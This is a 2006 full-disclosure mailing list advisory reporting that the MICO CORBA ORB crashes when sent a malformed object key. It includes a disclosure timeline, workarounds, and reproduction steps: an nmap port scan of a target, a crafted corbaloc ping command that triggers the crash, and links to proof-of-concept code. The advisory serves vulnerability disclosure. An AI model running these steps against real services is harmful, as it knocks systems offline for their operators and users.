[<prev] [next>] [day] [month] [year] [list]
Message-ID: <be10f1c50607061203n33da44e4m487bd48891f00c17@mail.gmail.com>
Date: Thu, 6 Jul 2006 21:03:12 +0200
From: tuergeist <tuergeist@...glemail.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Mico crashes when contected with wrong IOR / DoS
== == == TOC == == ==
1. Affected Vendor
2. Affected Product
3. Vulnerability
4. Safety Hazard
5. Disclosure Timeline
6. Vendor Response
7. Patch / Workaround
8. Vulnerability Details
---------------------
== 1. Affected Vendor ==
Object Security
== 2. Affected Products ==
MICO - Mico is CORBA, Open Source ORB
tested on Version
2.3.12RC3
2.3.12
and latest from repository
more infos: http://www.mico.org
== 3. Vulnerability ==
MICO crashes when contacted with wrong object key (part: orb-id or
orb-creation time)
== 4. Safety Hazard ==
critical, potential Denial-of-Service
== 5. Disclosure Timeline ==
2006-06-27 Problem found and analysed / tested with other versions
2006-06-29 Vulnerability reported to vendor and MICOs
devel-mailing-list
2006-07-05 2nd mail to vendor and mailing-list
2006-07-06 Full disclosure
== 6. Vendor Response ==
None.
== 7. Patch / Workaround ==
No Patch avaible yet.
possible Workarounds
a) Don't use MICO in or over public networks
b) Protect MICO with an (IIOP) firewall
== 8. Vulnerability Details ==
The following is for educational purposes only!
Start the orb, you'll crash # Example code
-> http://wwwstud.informatik.uni-rostock.de/~cb098/mico_bug.tgz
$ ./server
scan your target...
$ sudo nmap -sS -oM results.nmap -p 1-65535 192.168.1.10 /
| grep unknown
8010/tcp open unknown
49576/tcp open unknown
51140/tcp open unknown
One of these port could be the orb. Lets try to ping
(object._non_exists()) the last one. For this I'm using a special
handmade CORBA-Ping-Prog. It's also possible to use JacORBs pingo..
My JPing is avaible at
http://wwwstud.informatik.uni-rostock.de/~cb098/JPing.java
$ java JPing -p corbaloc:: 192.168.1.10:8010//200/1151845678/0/_5
orb.string_to_object ... ok
object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
vmcid: SUN minor code: 208 completed: Maybe
The line above are indicating that there was something wrong. On
every active port, you'll get COMM_FAILURE; but on the ORB-port
OBJECT_NOT_EXIST is expected and mandatory by OMG CORBA Spec.
(See http://www.omg.org)
-- mico testserver crashed / output --
A look into server terminal let us know, that there's sth. wrong.
$ ./server
IOR:010000000e00000049444c3a48656c6c6f3a312e300000000200000000000000390
0000001010000160000006c6f63616c686f73 742e6c6f63616c646f6d61696e00c4c71
50000002f363836302f313135313735303432362f302f5f300000000100000024000000
0100 000001000000010000001400000001000000010001000000000009010100000000
00 # myior <-- everything is ok until here
server: orb.cc:332: void CORBA::ORBInvokeRec::set_answer_invoke(CORBA::
InvokeStatus, CORBA::Object*, CORBA:: ORBRequest*, GIOP::AddressingDisp
osition): Assertion `_type == RequestInvoke' failed.
Aborted
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists